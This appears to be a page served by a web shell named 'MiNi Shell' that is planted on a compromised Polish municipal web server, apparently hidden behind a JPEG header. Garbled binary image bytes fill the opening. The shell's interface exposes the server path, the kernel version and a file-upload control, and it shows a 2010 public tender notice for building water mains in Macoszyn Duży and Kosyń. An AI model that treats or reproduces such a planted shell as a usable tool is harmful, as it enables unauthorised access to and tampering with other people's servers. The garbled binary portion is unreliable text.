JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100427/100105-N-2010.html

<p class="kh_header"><b>Wola Uhruska: Budowa wodociągu wraz z przyłączami w miejscowościach Macoszyn Duży i Kosyń</b><br>
<b>Numer ogłoszenia: 100105 - 2010; data zamieszczenia: 27.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wola Uhruska , ul. Parkowa 5, 22-230 Wola Uhruska, woj. lubelskie, tel. 082 5915003.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wolauhruska.netbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa wodociągu wraz z przyłączami w miejscowościach Macoszyn Duży i Kosyń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest Budowa wodociągu wraz z przyłączami w miejscowościach Macoszyn Duży i Kosyń.
Zgodnie ze wspólnym słownikiem zamówień publicznych zamówienie obejmuje następujące roboty:
45231300-8 Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzenia ścieków.
Zadanie obejmuje budowę sieci wodociągowej wraz z przyłączami w miejscowościach Macoszyn Duży i Kosyń gmina Wola Uhruska oraz przejście i włączenie do istniejącego wodociągu (Dubeczno) w dwóch miejscach w miejscowości Macoszyn Mały gmina Hańsk według przedmiarów, obmiarów. Sieć wodociągowa w Macoszynie Dużym jest II etapem budowy sieci wodociągowej w gminie Hańsk.
Sieć wodociągowa w miejscowości Macoszyn Duży:
a)sieć wodociągowa główna:
PVC 160 Dn 150 - 1 866 mb
PVC 90 Dn 80 - 3 548 mb
PE 90 Dn 80 - 12 mb
b)siec wodociągowa rozdzielcza:
PE 32 Dn 25 - 184 mb
PE 40 Dn 32 - 177 mb
PE 50 Dn 40 - 619 mb

c)przyłącza:
PE 32 Dn 25 - 581 mb
PE 40 Dn 32 - 295 mb
PE 50 Dn 40 - 82 mb
ilość przyłączy wodociągowych - 26 szt.
Sieć wodociągowa w miejscowości Kosyń:
d)sieć wodociągowa główna:
PVC 160 Dn 150 - 3 436 mb
PVC 110 Dn 100 - 621 mb
PVC 90 Dn 80 - 1 345 mb
PE 63 Dn 50 - 155 mb
PE 50 Dn 40 - 342 mb
e)sieć wodociągowa rozdzielcza:
PE 32 Dn 25 - 150 mb
PE 40 Dn 32 - 304 mb
f)przyłącza:
PE 32 - 626 mb
PE 40 - 256 mb
PE 50 - 218 mb
ilość przyłączy wodociągowych - 53 szt.

Szczegółowy opis przedmiotu zamówienia zawarty jest w wyciągu z dokumentacji projektowej stanowiącej załączniki 5a, 5b, 5c i 5d. Pełna dokumentacja techniczna dostępna jest w siedzibie Zamawiającego w pok. nr 7. Z dokumentacją tą można zapoznać się codziennie w dni robocze od godz. 9.00 do godz. 14.00 od dnia ogłoszenia przetargu.
Wymagany, minimalny okres gwarancji na wykonane roboty wynosi 36 miesięcy od daty ostatecznego odbioru robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Budowa sieci wodociągowej i przyłączy.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 25 000 zł należy wnieść do godz. 10.45 dnia 18 maja 2010 r. w Urzędzie Gminy w formie określonej w ustawie. Wadium wnoszone w pieniądzu należy wpłacać na konto Gminy:
BS Leśniowice o/Wola Uhruska 03 8195 0009 2005 0090 0736 0011
z dopiskiem Przetarg - budowa wodociągu w wyżej wymienionym terminie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w tym: min. 1 osoba posiadająca uprawnienia do kierowania robotami budowlanymi w specjalnościach: instalacyjno - inżynieryjnej w zakresie sieci sanitarnych /wodociągi, kanalizacje/, zgodnie z ustawą z dnia 7 lipca 1994 roku - Prawo budowlane (Dz. U. z 2003 r. Nr 207 poz. 2016 z późno zm.) oraz ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5 poz. 42 z późn. zm.), (ocena spełnienia warunku będzie dokonywana na podstawie wypełnionego Załącznika nr 3 - Wykaz osób i podmiotów).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia w tym w okresie ostatnich 5 lat wykonali zadania w zakresie budowy wodociągu lub kanalizacji o wartości łącznej nie mniejszej niż wartość oferty. Ocena spełnienia tego warunku będzie dokonywana na podstawie wypełnionego załącznika nr 7 do SIWZ - wykaz wykonanych robót oraz załączonych referencji. Warunek zostanie spełniony jeżeli wartość robót będzie nie mniejsza niż wartość oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do  wykonania zamówienia, w tym: min. 1 osoba posiadająca uprawnienia w specjalności instalacyjno - inżynieryjnej w zakresie sieci sanitarnych (wodociągi, kanalizacje), zgodnie z ustawą z dnia 7 lipca 1994 roku - Prawo budowlane (Dz. U. z 2003 r. Nr 207 poz. 2016 z późno zm.) oraz ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5 poz. 42 z późn. zm.), (ocena spełnienia warunku będzie dokonywana na podstawie wypełnionego Załącznika nr 3 - Wykaz osób i podmiotów).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do  wykonania zamówienia, w tym: min. 1 osoba posiadająca uprawnienia w specjalności instalacyjno - inżynieryjnej w zakresie sieci sanitarnych (wodociągi, kanalizacje), zgodnie z ustawą z dnia 7 lipca 1994 roku - Prawo budowlane (Dz. U. z 2003 r. Nr 207 poz. 2016 z późno zm.) oraz ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5 poz. 42 z późn. zm.), (ocena spełnienia warunku będzie dokonywana na podstawie wypełnionego Załącznika nr 3 - Wykaz osób i podmiotów).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, w tym:
1. Posiadają środki własne lub zdolność kredytową do kwoty stanowiącej 50% wartości oferty (ocena spełnienia warunku będzie dokonywana na podstawie  informacji banku w którym wykonawca posiada rachunek bankowy, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub zobowiązania o którym mowa w rozdziale II, punkt 12),
2. Nie zalegają  z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, (ocena dokonywana będzie na podstawie przedłożonych zaświadczeń).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do wypełnionego formularza oferty (który stanowi załącznik nr 1 do specyfikacji) winny być dołączone następujące dokumenty: 
1.Oświadczenie Wykonawcy w trybie art. 22 ust. 1 i art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych, o treści zgodnej z wzorem stanowiącym załącznik nr 2 do specyfikacji.
2.Kosztorysy ofertowe (szczegółowe) opracowane na podstawie dokumentacji technicznej oraz przedmiarów robót.
3.Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia zgodnie z zapisami Część II Rozdz. I pkt. 1 i 3, a także zakresu wykonywanych przez nich czynności wg załącznika nr 3 do specyfikacji (kadra kierownicza i średni personel techniczny). 
4.Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.Informację banku w którym wykonawca posiada rachunek bankowy, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Jeżeli wielkość posiadanych środków lub zdolność kredytowa, albo obie te wielkości łącznie, będą niższe niż 50 % ceny ofertowej brutto, to wykonawca zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona.
6.Wykaz zrealizowanych robót z podaniem ich zakresu i wartości oraz referencje obejmujące przynajmniej zakres o którym mowa w Rozdziale II pkt. 2 zgodnie z załącznikiem nr 7 do niniejszej SIWZ.
7.Parafowany projekt umowy wg załącznika nr 4 do specyfikacji. 
8.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego albo składania ofert.
9.Aktualne zaświadczenie z Krajowego Rejestru Karnego potwierdzające niekaralność oferenta, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
10.Wypełniony harmonogram rzeczowo-finansowy (załącznik nr 6 do niniejszej SIWZ).
11.W przypadku gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy:
1)zmiana stawki i kwoty podatku VAT oraz wynagrodzenia brutto określonych w § 6,
2)zmniejszenie zakresu przedmiotu zamówienia, gdy jego wykonanie w pierwotnym zakresie nie leży w interesie Zamawiającego, 
3)zmiana materiałów budowlanych, sprzętu, urządzeń, gdy wykorzystanie materiałów budowlanych, sprzętu, urządzeń wskazanych w dokumentacji projektowej lub ofercie stanie się niemożliwe bądź podyktowane będzie usprawnieniem procesu budowy, zwiększeniem bezpieczeństwa na budowie,
4)zmiana harmonogramu robót i finansowania, 
5)zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a)gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego,
b)działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie,
c)zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie prac budowlanych lub spełnienie wymogów technologicznych, udokumentowanych w dzienniku budowy,
d)błędów w dokumentacji projektowej, których usunięcie będzie wymagało naniesienia przez projektanta poprawek lub zmian w projekcie,
e)realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, powodującego konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań,
f)przerwy w dostawie prądu, wody, gazu, trwającej ponad 7 dni, 
g)konieczności zmniejszenia zakresu przedmiotu zamówienia, gdy jego wykonanie w pierwotnym zakresie nie leży w interesie Zamawiającego, 
h)konieczności uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie robót, 
i)konieczności zmiany harmonogramu robót i finansowania,
j)konieczności wykonania dodatkowych badań i ekspertyz, 
k)wystąpienia prac lub badań archeologicznych, powodujących konieczność wstrzymania robót objętych niniejszą umową,
6)zmiana kierownika budowy lub inspektora nadzoru.
2.Zmiany umowy przewidziane w ust. 1 dopuszczalne są na następujących warunkach:
1)ad pkt 1) - stawka i kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę,
2)ad pkt 2) - zmniejszenie zakresu przedmiotu umowy w granicach uzasadnionego interesu Zamawiającego,
3)ad pkt 3) - zamiana na materiały, urządzenia i sprzęt posiadające co najmniej takie same parametry jakościowe i cechy użytkowe, jak te, które stanowiły podstawę wyboru oferty, pod warunkiem nie zwiększania ceny;
4)ad pkt 4) - w zakresie wynikającym ze zmian w planie finansowym Zamawiającego (budżetu miasta),
5)ad pkt. 5) - zmiana terminu realizacji przedmiotu zamówienia:
a)lit. a) - o okres umożliwiający osiągnięcie uzasadnionego interesu Zamawiającego,
b)lit. b) - o okres działania siły wyższej oraz potrzebny do usunięcia skutków tego działania,
c)lit. c) - o czas trwania niesprzyjających warunków atmosferycznych
d)lit. d) - o okres nanoszenia przez projektanta poprawek bez zmian w projekcie trwających ponad 7 dni;
e)lit. e) - o okres niezbędny do wykonania prac powiązanych z przedmiotem niniejszej umowy, realizowanych w drodze odrębnej umowy,
f)lit. f), - o okres występowania przerwy w dostawie prądu, wody lub gazu, trwającej ponad 7 dni,
g)lit. g) - o okres proporcjonalny do zmniejszonego zakresu, 
h)lit. h) - o okres niezbędny do uzyskania wymaganych decyzji bądź uzgodnień.
i)lit. i) - o okres proporcjonalny do zmian wynikających ze zmienionego harmonogramu,
j)lit. j) i lit. k) - o okres niezbędny do wykonania dodatkowych ekspertyz,  prac lub badań,
6)ad pkt. 6) - w przypadku choroby, śmierci lub innych nieprzewidzianych zdarzeń losowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wolauhruska.netbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wola Uhruska
ul. Parkowa 5
22-230 Wola Uhruska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2010 godzina 10:45, miejsce: Urząd Gminy Wola Uhruska, ul. Parkowa 5, 22-230 Wola Uhruska, Kancelaria Ogólna pokój nr 11..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany przy wsparciu środków Unii Europejskiej w ramach Działania 321 Podstawowe usługi dla gospodarki i ludności wiejskiej, objętego Programem Rozwoju Obszarów Wiejskich na lata 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com